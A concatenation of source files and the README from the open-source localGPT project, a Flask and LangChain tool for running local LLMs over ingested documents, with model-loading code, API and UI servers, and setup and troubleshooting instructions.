= "model.safetensors" # MODEL_ID = "TheBloke/Airoboros-65B-GPT4-2.0-GPTQ" # MODEL_BASENAME = "model.safetensors" # MODEL_ID = "TheBloke/gpt4-alpaca-lora_mlp-65B-GPTQ" # MODEL_BASENAME = "model.safetensors" # MODEL_ID = "TheBloke/Upstage-Llama1-65B-Instruct-GPTQ" # MODEL_BASENAME = "model.safetensors" ##### 24GB VRAM Graphics Cards (RTX 3090 - RTX 4090 (35% Faster) - RTX A5000 - RTX A5500) ##### ### 13b GPTQ Models for 24GB GPUs (*** With best embedding model: hkunlp/instructor-xl ***) # MODEL_ID = "TheBloke/Wizard-Vicuna-13B-Uncensored-GPTQ" # MODEL_BASENAME = "Wizard-Vicuna-13B-Uncensored-GPTQ-4bit-128g.compat.no-act-order.safetensors" # MODEL_ID = "TheBloke/vicuna-13B-v1.5-GPTQ" # MODEL_BASENAME = "model.safetensors" # MODEL_ID = "TheBloke/Nous-Hermes-13B-GPTQ" # MODEL_BASENAME = "nous-hermes-13b-GPTQ-4bit-128g.no-act.order" # MODEL_ID = "TheBloke/WizardLM-13B-V1.2-GPTQ" # MODEL_BASENAME = "gptq_model-4bit-128g.safetensors ### 30b GPTQ Models for 24GB GPUs (*** Requires using intfloat/e5-base-v2 instead of hkunlp/instructor-large as embedding model ***) # MODEL_ID = "TheBloke/Wizard-Vicuna-30B-Uncensored-GPTQ" # MODEL_BASENAME = "Wizard-Vicuna-30B-Uncensored-GPTQ-4bit--1g.act.order.safetensors" # MODEL_ID = "TheBloke/WizardLM-30B-Uncensored-GPTQ" # MODEL_BASENAME = "WizardLM-30B-Uncensored-GPTQ-4bit.act-order.safetensors" ##### 8-10GB VRAM Graphics Cards (RTX 3080 - RTX 3080 Ti - RTX 3070 Ti - 3060 Ti - RTX 2000 Series, Quadro RTX 4000, 5000, 6000) ##### ### (*** Requires using intfloat/e5-small-v2 instead of hkunlp/instructor-large as embedding model ***) ### 7b GPTQ Models for 8GB GPUs # MODEL_ID = "TheBloke/Wizard-Vicuna-7B-Uncensored-GPTQ" # MODEL_BASENAME = "Wizard-Vicuna-7B-Uncensored-GPTQ-4bit-128g.no-act.order.safetensors" # MODEL_ID = "TheBloke/WizardLM-7B-uncensored-GPTQ" # MODEL_BASENAME = "WizardLM-7B-uncensored-GPTQ-4bit-128g.compat.no-act-order.safetensors" # MODEL_ID = "TheBloke/wizardLM-7B-GPTQ" # MODEL_BASENAME = "wizardLM-7B-GPTQ-4bit.compat.no-act-order.safetensors" #### #### (FOR GGML) (Quantized cpu+gpu+mps) models - check if they support llama.cpp #### # MODEL_ID = "TheBloke/wizard-vicuna-13B-GGML" # MODEL_BASENAME = "wizard-vicuna-13B.ggmlv3.q4_0.bin" # MODEL_BASENAME = "wizard-vicuna-13B.ggmlv3.q6_K.bin" # MODEL_BASENAME = "wizard-vicuna-13B.ggmlv3.q2_K.bin" # MODEL_ID = "TheBloke/orca_mini_3B-GGML" # MODEL_BASENAME = "orca-mini-3b.ggmlv3.q4_0.bin" #### #### (FOR AWQ QUANTIZED) Select a llm model based on your GPU and VRAM GB. Does not include Embedding Models VRAM usage. ### (*** MODEL_BASENAME is not actually used but have to contain .awq so the correct model loading is used ***) ### (*** Compute capability 7.5 (sm75) and CUDA Toolkit 11.8+ are required ***) #### # MODEL_ID = "TheBloke/Llama-2-7B-Chat-AWQ" # MODEL_BASENAME = "model.safetensors.awq" File: run_localGPT_API.py import logging import os import shutil import subprocess import argparse import torch from flask import Flask, jsonify, request from langchain.chains import RetrievalQA from langchain.embeddings import HuggingFaceInstructEmbeddings # from langchain.embeddings import HuggingFaceEmbeddings from run_localGPT import load_model from prompt_template_utils import get_prompt_template # from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler from langchain.vectorstores import Chroma from werkzeug.utils import secure_filename from constants import CHROMA_SETTINGS, EMBEDDING_MODEL_NAME, PERSIST_DIRECTORY, MODEL_ID, MODEL_BASENAME # API queue addition from threading import Lock request_lock = Lock() if torch.backends.mps.is_available(): DEVICE_TYPE = "mps" elif torch.cuda.is_available(): DEVICE_TYPE = "cuda" else: DEVICE_TYPE = "cpu" SHOW_SOURCES = True logging.info(f"Running on: {DEVICE_TYPE}") logging.info(f"Display Source Documents set to: {SHOW_SOURCES}") EMBEDDINGS = HuggingFaceInstructEmbeddings(model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": DEVICE_TYPE}) # uncomment the following line if you used HuggingFaceEmbeddings in the ingest.py # EMBEDDINGS = HuggingFaceEmbeddings(model_name=EMBEDDING_MODEL_NAME) # if os.path.exists(PERSIST_DIRECTORY): # try: # shutil.rmtree(PERSIST_DIRECTORY) # except OSError as e: # print(f"Error: {e.filename} - {e.strerror}.") # else: # print("The directory does not exist") # run_langest_commands = ["python", "ingest.py"] # if DEVICE_TYPE == "cpu": # run_langest_commands.append("--device_type") # run_langest_commands.append(DEVICE_TYPE) # result = subprocess.run(run_langest_commands, capture_output=True) # if result.returncode != 0: # raise FileNotFoundError( # "No files were found inside SOURCE_DOCUMENTS, please put a starter file inside before starting the API!" # ) # load the vectorstore DB = Chroma( persist_directory=PERSIST_DIRECTORY, embedding_function=EMBEDDINGS, client_settings=CHROMA_SETTINGS, ) RETRIEVER = DB.as_retriever() LLM = load_model(device_type=DEVICE_TYPE, model_id=MODEL_ID, model_basename=MODEL_BASENAME) prompt, memory = get_prompt_template(promptTemplate_type="llama", history=False) QA = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=RETRIEVER, return_source_documents=SHOW_SOURCES, chain_type_kwargs={ "prompt": prompt, }, ) app = Flask(__name__) @app.route("/api/delete_source", methods=["GET"]) def delete_source_route(): folder_name = "SOURCE_DOCUMENTS" if os.path.exists(folder_name): shutil.rmtree(folder_name) os.makedirs(folder_name) return jsonify({"message": f"Folder '{folder_name}' successfully deleted and recreated."}) @app.route("/api/save_document", methods=["GET", "POST"]) def save_document_route(): if "document" not in request.files: return "No document part", 400 file = request.files["document"] if file.filename == "": return "No selected file", 400 if file: filename = secure_filename(file.filename) folder_path = "SOURCE_DOCUMENTS" if not os.path.exists(folder_path): os.makedirs(folder_path) file_path = os.path.join(folder_path, filename) file.save(file_path) return "File saved successfully", 200 @app.route("/api/run_ingest", methods=["GET"]) def run_ingest_route(): global DB global RETRIEVER global QA try: if os.path.exists(PERSIST_DIRECTORY): try: shutil.rmtree(PERSIST_DIRECTORY) except OSError as e: print(f"Error: {e.filename} - {e.strerror}.") else: print("The directory does not exist") run_langest_commands = ["python", "ingest.py"] if DEVICE_TYPE == "cpu": run_langest_commands.append("--device_type") run_langest_commands.append(DEVICE_TYPE) result = subprocess.run(run_langest_commands, capture_output=True) if result.returncode != 0: return "Script execution failed: {}".format(result.stderr.decode("utf-8")), 500 # load the vectorstore DB = Chroma( persist_directory=PERSIST_DIRECTORY, embedding_function=EMBEDDINGS, client_settings=CHROMA_SETTINGS, ) RETRIEVER = DB.as_retriever() prompt, memory = get_prompt_template(promptTemplate_type="llama", history=False) QA = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=RETRIEVER, return_source_documents=SHOW_SOURCES, chain_type_kwargs={ "prompt": prompt, }, ) return "Script executed successfully: {}".format(result.stdout.decode("utf-8")), 200 except Exception as e: return f"Error occurred: {str(e)}", 500 @app.route("/api/prompt_route", methods=["GET", "POST"]) def prompt_route(): global QA global request_lock # Make sure to use the global lock instance user_prompt = request.form.get("user_prompt") if user_prompt: # Acquire the lock before processing the prompt with request_lock: # print(f'User Prompt: {user_prompt}') # Get the answer from the chain res = QA(user_prompt) answer, docs = res["result"], res["source_documents"] prompt_response_dict = { "Prompt": user_prompt, "Answer": answer, } prompt_response_dict["Sources"] = [] for document in docs: prompt_response_dict["Sources"].append( (os.path.basename(str(document.metadata["source"])), str(document.page_content)) ) return jsonify(prompt_response_dict), 200 else: return "No user prompt received", 400 if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--port", type=int, default=5110, help="Port to run the API on. Defaults to 5110.") parser.add_argument( "--host", type=str, default="127.0.0.1", help="Host to run the UI on. Defaults to 127.0.0.1. " "Set to 0.0.0.0 to make the UI externally " "accessible from other devices.", ) args = parser.parse_args() logging.basicConfig( format="%(asctime)s - %(levelname)s - %(filename)s:%(lineno)s - %(message)s", level=logging.INFO ) app.run(debug=False, host=args.host, port=args.port) File: utils.py import os import csv from datetime import datetime from constants import EMBEDDING_MODEL_NAME from langchain.embeddings import HuggingFaceInstructEmbeddings from langchain.embeddings import HuggingFaceBgeEmbeddings from langchain.embeddings import HuggingFaceEmbeddings def log_to_csv(question, answer): log_dir, log_file = "local_chat_history", "qa_log.csv" # Ensure log directory exists, create if not if not os.path.exists(log_dir): os.makedirs(log_dir) # Construct the full file path log_path = os.path.join(log_dir, log_file) # Check if file exists, if not create and write headers if not os.path.isfile(log_path): with open(log_path, mode="w", newline="", encoding="utf-8") as file: writer = csv.writer(file) writer.writerow(["timestamp", "question", "answer"]) # Append the log entry with open(log_path, mode="a", newline="", encoding="utf-8") as file: writer = csv.writer(file) timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") writer.writerow([timestamp, question, answer]) def get_embeddings(device_type="cuda"): if "instructor" in EMBEDDING_MODEL_NAME: return HuggingFaceInstructEmbeddings( model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": device_type}, embed_instruction="Represent the document for retrieval:", query_instruction="Represent the question for retrieving supporting documents:", ) elif "bge" in EMBEDDING_MODEL_NAME: return HuggingFaceBgeEmbeddings( model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": device_type}, query_instruction="Represent this sentence for searching relevant passages:", ) else: return HuggingFaceEmbeddings( model_name=EMBEDDING_MODEL_NAME, model_kwargs={"device": device_type}, ) File: load_models.py import sys import torch if sys.platform != "darwin": from auto_gptq import AutoGPTQForCausalLM from huggingface_hub import hf_hub_download from langchain.llms import LlamaCpp from transformers import AutoModelForCausalLM, AutoTokenizer, LlamaForCausalLM, LlamaTokenizer, BitsAndBytesConfig from constants import CONTEXT_WINDOW_SIZE, MAX_NEW_TOKENS, MODELS_PATH, N_BATCH, N_GPU_LAYERS def load_quantized_model_gguf_ggml(model_id, model_basename, device_type, logging): """ Load a GGUF/GGML quantized model using LlamaCpp. This function attempts to load a GGUF/GGML quantized model using the LlamaCpp library. If the model is of type GGML, and newer version of LLAMA-CPP is used which does not support GGML, it logs a message indicating that LLAMA-CPP has dropped support for GGML. Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - model_basename (str): The base name of the model file. - device_type (str): The type of device where the model will run, e.g., 'mps', 'cuda', etc. - logging (logging.Logger): Logger instance for logging messages. Returns: - LlamaCpp: An instance of the LlamaCpp model if successful, otherwise None. Notes: - The function uses the `hf_hub_download` function to download the model from the HuggingFace Hub. - The number of GPU layers is set based on the device type. """ try: logging.info("Using Llamacpp for GGUF/GGML quantized models") model_path = hf_hub_download( repo_id=model_id, filename=model_basename, resume_download=True, cache_dir=MODELS_PATH, ) kwargs = { "model_path": model_path, "n_ctx": CONTEXT_WINDOW_SIZE, "max_tokens": MAX_NEW_TOKENS, "n_batch": N_BATCH, # set this based on your GPU & CPU RAM } if device_type.lower() == "mps": kwargs["n_gpu_layers"] = 1 if device_type.lower() == "cuda": kwargs["n_gpu_layers"] = N_GPU_LAYERS # set this based on your GPU return LlamaCpp(**kwargs) except TypeError: if "ggml" in model_basename: logging.INFO("If you were using GGML model, LLAMA-CPP Dropped Support, Use GGUF Instead") return None def load_quantized_model_qptq(model_id, model_basename, device_type, logging): """ Load a GPTQ quantized model using AutoGPTQForCausalLM. This function loads a quantized model that ends with GPTQ and may have variations of .no-act.order or .safetensors in their HuggingFace repo. It will not work for Macs, as AutoGPTQ only supports Linux and Windows: - Nvidia CUDA (Windows and Linux) - AMD ROCm (Linux only) - CPU QiGen (Linux only, new and experimental) Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - model_basename (str): The base name of the model file. - device_type (str): The type of device where the model will run. - logging (logging.Logger): Logger instance for logging messages. Returns: - model (AutoGPTQForCausalLM): The loaded quantized model. - tokenizer (AutoTokenizer): The tokenizer associated with the model. Notes: - The function checks for the ".safetensors" ending in the model_basename and removes it if present. """ if sys.platform == "darwin": logging.INFO("GPTQ models will NOT work on Mac devices. Please choose a different model.") return None, None # The code supports all huggingface models that ends with GPTQ and have some variation # of .no-act.order or .safetensors in their HF repo. logging.info("Using AutoGPTQForCausalLM for quantized models") if ".safetensors" in model_basename: # Remove the ".safetensors" ending if present model_basename = model_basename.replace(".safetensors", "") tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True) logging.info("Tokenizer loaded") model = AutoGPTQForCausalLM.from_quantized( model_id, model_basename=model_basename, use_safetensors=True, trust_remote_code=True, device_map="auto", use_triton=False, quantize_config=None, ) return model, tokenizer def load_full_model(model_id, model_basename, device_type, logging): """ Load a full model using either LlamaTokenizer or AutoModelForCausalLM. This function loads a full model based on the specified device type. If the device type is 'mps' or 'cpu', it uses LlamaTokenizer and LlamaForCausalLM. Otherwise, it uses AutoModelForCausalLM. Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - model_basename (str): The base name of the model file. - device_type (str): The type of device where the model will run. - logging (logging.Logger): Logger instance for logging messages. Returns: - model (Union[LlamaForCausalLM, AutoModelForCausalLM]): The loaded model. - tokenizer (Union[LlamaTokenizer, AutoTokenizer]): The tokenizer associated with the model. Notes: - The function uses the `from_pretrained` method to load both the model and the tokenizer. - Additional settings are provided for NVIDIA GPUs, such as loading in 4-bit and setting the compute dtype. """ if device_type.lower() in ["mps", "cpu"]: logging.info("Using AutoModelForCausalLM") # tokenizer = LlamaTokenizer.from_pretrained(model_id, cache_dir="./models/") # model = LlamaForCausalLM.from_pretrained(model_id, cache_dir="./models/") model = AutoModelForCausalLM.from_pretrained(model_id, # quantization_config=quantization_config, # low_cpu_mem_usage=True, # torch_dtype="auto", torch_dtype=torch.bfloat16, device_map="auto", cache_dir="./models/") tokenizer = AutoTokenizer.from_pretrained(model_id, cache_dir="./models/") else: logging.info("Using AutoModelForCausalLM for full models") tokenizer = AutoTokenizer.from_pretrained(model_id, cache_dir="./models/") logging.info("Tokenizer loaded") bnb_config = BitsAndBytesConfig( load_in_4bit=True, bnb_4bit_use_double_quant=True, bnb_4bit_quant_type="nf4", bnb_4bit_compute_dtype=torch.float16 ) model = AutoModelForCausalLM.from_pretrained( model_id, device_map="auto", torch_dtype=torch.float16, low_cpu_mem_usage=True, cache_dir=MODELS_PATH, trust_remote_code=True, # set these if you are using NVIDIA GPU quantization_config=bnb_config # load_in_4bit=True, # bnb_4bit_quant_type="nf4", # bnb_4bit_compute_dtype=torch.float16, # max_memory={0: "15GB"}, # Uncomment this line with you encounter CUDA out of memory errors ) model.tie_weights() return model, tokenizer def load_quantized_model_awq(model_id, logging): """ Load a AWQ quantized model using AutoModelForCausalLM. This function loads a quantized model that ends with AWQ. It will not work for Macs as AutoAWQ currently only supports Nvidia GPUs. Parameters: - model_id (str): The identifier for the model on HuggingFace Hub. - logging (logging.Logger): Logger instance for logging messages. Returns: - model (AutoModelForCausalLM): The loaded quantized model. - tokenizer (AutoTokenizer): The tokenizer associated with the model. """ if sys.platform == "darwin": logging.INFO("AWQ models will NOT work on Mac devices. Please choose a different model.") return None, None # The code supports all huggingface models that ends with AWQ. logging.info("Using AutoModelForCausalLM for AWQ quantized models") tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True) logging.info("Tokenizer loaded") model = AutoModelForCausalLM.from_pretrained( model_id, use_safetensors=True, trust_remote_code=True, device_map="auto", ) return model, tokenizer File: localGPTUI/localGPTUI.py import argparse import os import sys import tempfile import requests from flask import Flask, render_template, request from werkzeug.utils import secure_filename sys.path.append(os.path.join(os.path.dirname(__file__), "..")) app = Flask(__name__) app.secret_key = "LeafmanZSecretKey" API_HOST = "http://localhost:5110/api" # PAGES # @app.route("/", methods=["GET", "POST"]) def home_page(): if request.method == "POST": if "user_prompt" in request.form: user_prompt = request.form["user_prompt"] print(f"User Prompt: {user_prompt}") main_prompt_url = f"{API_HOST}/prompt_route" response = requests.post(main_prompt_url, data={"user_prompt": user_prompt}) print(response.status_code) # print HTTP response status code for debugging if response.status_code == 200: # print(response.json()) # Print the JSON data from the response return render_template("home.html", show_response_modal=True, response_dict=response.json()) elif "documents" in request.files: delete_source_url = f"{API_HOST}/delete_source" # URL of the /api/delete_source endpoint if request.form.get("action") == "reset": response = requests.get(delete_source_url) save_document_url = f"{API_HOST}/save_document" run_ingest_url = f"{API_HOST}/run_ingest" # URL of the /api/run_ingest endpoint files = request.files.getlist("documents") for file in files: print(file.filename) filename = secure_filename(file.filename) with tempfile.SpooledTemporaryFile() as f: f.write(file.read()) f.seek(0) response = requests.post(save_document_url, files={"document": (filename, f)}) print(response.status_code) # print HTTP response status code for debugging # Make a GET request to the /api/run_ingest endpoint response = requests.get(run_ingest_url) print(response.status_code) # print HTTP response status code for debugging # Display the form for GET request return render_template( "home.html", show_response_modal=False, response_dict={"Prompt": "None", "Answer": "None", "Sources": [("ewf", "wef")]}, ) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--port", type=int, default=5111, help="Port to run the UI on. Defaults to 5111.") parser.add_argument( "--host", type=str, default="127.0.0.1", help="Host to run the UI on. Defaults to 127.0.0.1. " "Set to 0.0.0.0 to make the UI externally " "accessible from other devices.", ) args = parser.parse_args() app.run(debug=False, host=args.host, port=args.port)
# LocalGPT: Secure, Local Conversations with Your Documents 🌐 [![GitHub Stars](https://img.shields.io/github/stars/PromtEngineer/localGPT?style=social)](https://github.com/PromtEngineer/localGPT/stargazers) [![GitHub Forks](https://img.shields.io/github/forks/PromtEngineer/localGPT?style=social)](https://github.com/PromtEngineer/localGPT/network/members) [![GitHub Issues](https://img.shields.io/github/issues/PromtEngineer/localGPT)](https://github.com/PromtEngineer/localGPT/issues) [![GitHub Pull Requests](https://img.shields.io/github/issues-pr/PromtEngineer/localGPT)](https://github.com/PromtEngineer/localGPT/pulls) [![License](https://img.shields.io/github/license/PromtEngineer/localGPT)](https://github.com/PromtEngineer/localGPT/blob/main/LICENSE) 🚨🚨 You can run localGPT on a pre-configured [Virtual Machine](https://bit.ly/localGPT). Make sure to use the code: PromptEngineering to get 50% off. I will get a small commision! **LocalGPT** is an open-source initiative that allows you to converse with your documents without compromising your privacy. With everything running locally, you can be assured that no data ever leaves your computer. Dive into the world of secure, local document interactions with LocalGPT. ## Features 🌟 - **Utmost Privacy**: Your data remains on your computer, ensuring 100% security. - **Versatile Model Support**: Seamlessly integrate a variety of open-source models, including HF, GPTQ, GGML, and GGUF. - **Diverse Embeddings**: Choose from a range of open-source embeddings. - **Reuse Your LLM**: Once downloaded, reuse your LLM without the need for repeated downloads. - **Chat History**: Remembers your previous conversations (in a session). - **API**: LocalGPT has an API that you can use for building RAG Applications. - **Graphical Interface**: LocalGPT comes with two GUIs, one uses the API and the other is standalone (based on streamlit). - **GPU, CPU & MPS Support**: Supports multiple platforms out of the box, Chat with your data using `CUDA`, `CPU` or `MPS` and more! ## Dive Deeper with Our Videos 🎥 - [Detailed code-walkthrough](https://youtu.be/MlyoObdIHyo) - [Llama-2 with LocalGPT](https://youtu.be/lbFmceo4D5E) - [Adding Chat History](https://youtu.be/d7otIM_MCZs) - [LocalGPT - Updated (09/17/2023)](https://youtu.be/G_prHSKX9d4) ## Technical Details 🛠️ By selecting the right local models and the power of `LangChain` you can run the entire RAG pipeline locally, without any data leaving your environment, and with reasonable performance. - `ingest.py` uses `LangChain` tools to parse the document and create embeddings locally using `InstructorEmbeddings`. It then stores the result in a local vector database using `Chroma` vector store. - `run_localGPT.py` uses a local LLM to understand questions and create answers. The context for the answers is extracted from the local vector store using a similarity search to locate the right piece of context from the docs. - You can replace this local LLM with any other LLM from the HuggingFace. Make sure whatever LLM you select is in the HF format. This project was inspired by the original [privateGPT](https://github.com/imartinez/privateGPT). ## Built Using 🧩 - [LangChain](https://github.com/hwchase17/langchain) - [HuggingFace LLMs](https://huggingface.co/models) - [InstructorEmbeddings](https://instructor-embedding.github.io/) - [LLAMACPP](https://github.com/abetlen/llama-cpp-python) - [ChromaDB](https://www.trychroma.com/) - [Streamlit](https://streamlit.io/) # Environment Setup 🌍 1. 📥 Clone the repo using git: ```shell git clone https://github.com/PromtEngineer/localGPT.git ``` 2. 🐍 Install [conda](https://www.anaconda.com/download) for virtual environment management. Create and activate a new virtual environment. ```shell conda create -n localGPT python=3.10.0 conda activate localGPT ``` 3. 🛠️ Install the dependencies using pip To set up your environment to run the code, first install all requirements: ```shell pip install -r requirements.txt ``` ***Installing LLAMA-CPP :*** LocalGPT uses [LlamaCpp-Python](https://github.com/abetlen/llama-cpp-python) for GGML (you will need llama-cpp-python <=0.1.76) and GGUF (llama-cpp-python >=0.1.83) models. If you want to use BLAS or Metal with [llama-cpp](https://github.com/abetlen/llama-cpp-python#installation-with-openblas--cublas--clblast--metal) you can set appropriate flags: For `NVIDIA` GPUs support, use `cuBLAS` ```shell # Example: cuBLAS CMAKE_ARGS="-DLLAMA_CUBLAS=on" FORCE_CMAKE=1 pip install llama-cpp-python --no-cache-dir ``` For Apple Metal (`M1/M2`) support, use ```shell # Example: METAL CMAKE_ARGS="-DLLAMA_METAL=on" FORCE_CMAKE=1 pip install llama-cpp-python --no-cache-dir ``` For more details, please refer to [llama-cpp](https://github.com/abetlen/llama-cpp-python#installation-with-openblas--cublas--clblast--metal) ## Docker 🐳 Installing the required packages for GPU inference on NVIDIA GPUs, like gcc 11 and CUDA 11, may cause conflicts with other packages in your system. As an alternative to Conda, you can use Docker with the provided Dockerfile. It includes CUDA, your system just needs Docker, BuildKit, your NVIDIA GPU driver and the NVIDIA container toolkit. Build as `docker build -t localgpt .`, requires BuildKit. Docker BuildKit does not support GPU during *docker build* time right now, only during *docker run*. Run as `docker run -it --mount src="$HOME/.cache",target=/root/.cache,type=bind --gpus=all localgpt`. ## Test dataset For testing, this repository comes with [Constitution of USA](https://constitutioncenter.org/media/files/constitution.pdf) as an example file to use. ## Ingesting your OWN Data. Put your files in the `SOURCE_DOCUMENTS` folder. You can put multiple folders within the `SOURCE_DOCUMENTS` folder and the code will recursively read your files. ### Support file formats: LocalGPT currently supports the following file formats. LocalGPT uses `LangChain` for loading these file formats. The code in `constants.py` uses a `DOCUMENT_MAP` dictionary to map a file format to the corresponding loader. In order to add support for another file format, simply add this dictionary with the file format and the corresponding loader from [LangChain](https://python.langchain.com/docs/modules/data_connection/document_loaders/). ```shell DOCUMENT_MAP = { ".txt": TextLoader, ".md": TextLoader, ".py": TextLoader, ".pdf": PDFMinerLoader, ".csv": CSVLoader, ".xls": UnstructuredExcelLoader, ".xlsx": UnstructuredExcelLoader, ".docx": Docx2txtLoader, ".doc": Docx2txtLoader, } ``` ### Ingest Run the following command to ingest all the data. If you have `cuda` setup on your system. ```shell python ingest.py ``` You will see an output like this: <img width="1110" alt="Screenshot 2023-09-14 at 3 36 27 PM" src="https://github.com/PromtEngineer/localGPT/assets/134474669/c9274e9a-842c-49b9-8d95-606c3d80011f"> Use the device type argument to specify a given device. To run on `cpu` ```sh python ingest.py --device_type cpu ``` To run on `M1/M2` ```sh python ingest.py --device_type mps ``` Use help for a full list of supported devices. ```sh python ingest.py --help ``` This will create a new folder called `DB` and use it for the newly created vector store. You can ingest as many documents as you want, and all will be accumulated in the local embeddings database. If you want to start from an empty database, delete the `DB` and reingest your documents. Note: When you run this for the first time, it will need internet access to download the embedding model (default: `Instructor Embedding`). In the subsequent runs, no data will leave your local environment and you can ingest data without internet connection. ## Ask questions to your documents, locally! In order to chat with your documents, run the following command (by default, it will run on `cuda`). ```shell python run_localGPT.py ``` You can also specify the device type just like `ingest.py` ```shell python run_localGPT.py --device_type mps # to run on Apple silicon ``` This will load the ingested vector store and embedding model. You will be presented with a prompt: ```shell > Enter a query: ``` After typing your question, hit enter. LocalGPT will take some time based on your hardware. You will get a response like this below. <img width="1312" alt="Screenshot 2023-09-14 at 3 33 19 PM" src="https://github.com/PromtEngineer/localGPT/assets/134474669/a7268de9-ade0-420b-a00b-ed12207dbe41"> Once the answer is generated, you can then ask another question without re-running the script, just wait for the prompt again. ***Note:*** When you run this for the first time, it will need internet connection to download the LLM (default: `TheBloke/Llama-2-7b-Chat-GGUF`). After that you can turn off your internet connection, and the script inference would still work. No data gets out of your local environment. Type `exit` to finish the script. ### Extra Options with run_localGPT.py You can use the `--show_sources` flag with `run_localGPT.py` to show which chunks were retrieved by the embedding model. By default, it will show 4 different sources/chunks. You can change the number of sources/chunks ```shell python run_localGPT.py --show_sources ``` Another option is to enable chat history. ***Note***: This is disabled by default and can be enabled by using the `--use_history` flag. The context window is limited so keep in mind enabling history will use it and might overflow. ```shell python run_localGPT.py --use_history ``` You can store user questions and model responses with flag `--save_qa` into a csv file `/local_chat_history/qa_log.csv`. Every interaction will be stored. ```shell python run_localGPT.py --save_qa ``` # Run the Graphical User Interface 1. Open `constants.py` in an editor of your choice and depending on choice add the LLM you want to use. By default, the following model will be used: ```shell MODEL_ID = "TheBloke/Llama-2-7b-Chat-GGUF" MODEL_BASENAME = "llama-2-7b-chat.Q4_K_M.gguf" ``` 3. Open up a terminal and activate your python environment that contains the dependencies installed from requirements.txt. 4. Navigate to the `/LOCALGPT` directory. 5. Run the following command `python run_localGPT_API.py`. The API should being to run. 6. Wait until everything has loaded in. You should see something like `INFO:werkzeug:Press CTRL+C to quit`. 7. Open up a second terminal and activate the same python environment. 8. Navigate to the `/LOCALGPT/localGPTUI` directory. 9. Run the command `python localGPTUI.py`. 10. Open up a web browser and go the address `http://localhost:5111/`. # How to select different LLM models? To change the models you will need to set both `MODEL_ID` and `MODEL_BASENAME`. 1. Open up `constants.py` in the editor of your choice. 2. Change the `MODEL_ID` and `MODEL_BASENAME`. If you are using a quantized model (`GGML`, `GPTQ`, `GGUF`), you will need to provide `MODEL_BASENAME`. For unquantized models, set `MODEL_BASENAME` to `NONE` 5. There are a number of example models from HuggingFace that have already been tested to be run with the original trained model (ending with HF or have a .bin in its "Files and versions"), and quantized models (ending with GPTQ or have a .no-act-order or .safetensors in its "Files and versions"). 6. For models that end with HF or have a .bin inside its "Files and versions" on its HuggingFace page. - Make sure you have a `MODEL_ID` selected. For example -> `MODEL_ID = "TheBloke/guanaco-7B-HF"` - Go to the [HuggingFace Repo](https://huggingface.co/TheBloke/guanaco-7B-HF) 7. For models that contain GPTQ in its name and or have a .no-act-order or .safetensors extension inside its "Files and versions on its HuggingFace page. - Make sure you have a `MODEL_ID` selected. For example -> model_id = `"TheBloke/wizardLM-7B-GPTQ"` - Got to the corresponding [HuggingFace Repo](https://huggingface.co/TheBloke/wizardLM-7B-GPTQ) and select "Files and versions". - Pick one of the model names and set it as `MODEL_BASENAME`. For example -> `MODEL_BASENAME = "wizardLM-7B-GPTQ-4bit.compat.no-act-order.safetensors"` 8. Follow the same steps for `GGUF` and `GGML` models. # GPU and VRAM Requirements Below is the VRAM requirement for different models depending on their size (Billions of parameters). The estimates in the table does not include VRAM used by the Embedding models - which use an additional 2GB-7GB of VRAM depending on the model. | Mode Size (B) | float32 | float16 | GPTQ 8bit | GPTQ 4bit | | ------- | --------- | --------- | -------------- | ------------------ | | 7B | 28 GB | 14 GB | 7 GB - 9 GB | 3.5 GB - 5 GB | | 13B | 52 GB | 26 GB | 13 GB - 15 GB | 6.5 GB - 8 GB | | 32B | 130 GB | 65 GB | 32.5 GB - 35 GB| 16.25 GB - 19 GB | | 65B | 260.8 GB | 130.4 GB | 65.2 GB - 67 GB| 32.6 GB - 35 GB | # System Requirements ## Python Version To use this software, you must have Python 3.10 or later installed. Earlier versions of Python will not compile. ## C++ Compiler If you encounter an error while building a wheel during the `pip install` process, you may need to install a C++ compiler on your computer. ### For Windows 10/11 To install a C++ compiler on Windows 10/11, follow these steps: 1. Install Visual Studio 2022. 2. Make sure the following components are selected: - Universal Windows Platform development - C++ CMake tools for Windows 3. Download the MinGW installer from the [MinGW website](https://sourceforge.net/projects/mingw/). 4. Run the installer and select the "gcc" component. ### NVIDIA Driver's Issues: Follow this [page](https://linuxconfig.org/how-to-install-the-nvidia-drivers-on-ubuntu-22-04) to install NVIDIA Drivers. ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=PromtEngineer/localGPT&type=Date)](https://star-history.com/#PromtEngineer/localGPT&Date) # Disclaimer This is a test project to validate the feasibility of a fully local solution for question answering using LLMs and Vector embeddings. It is not production ready, and it is not meant to be used in production. Vicuna-7B is based on the Llama model so that has the original Llama license. # Common Errors - [Torch not compatible with CUDA enabled](https://github.com/pytorch/pytorch/issues/30664) - Get CUDA version ```shell nvcc --version ``` ```shell nvidia-smi ``` - Try installing PyTorch depending on your CUDA version ```shell conda install -c pytorch torchvision cudatoolkit=10.1 pytorch ``` - If it doesn't work, try reinstalling ```shell pip uninstall torch pip cache purge pip install torch -f https://download.pytorch.org/whl/torch_stable.html ``` - [ERROR: pip's dependency resolver does not currently take into account all the packages that are installed](https://stackoverflow.com/questions/72672196/error-pips-dependency-resolver-does-not-currently-take-into-account-all-the-pa/76604141#76604141) ```shell pip install h5py pip install typing-extensions pip install wheel ``` - [Failed to import transformers](https://github.com/huggingface/transformers/issues/11262) - Try re-install ```shell conda uninstall tokenizers, transformers pip install transformers ```
Python-100-Days
bf24146944745bb25c66c82307fd218abd179c6a
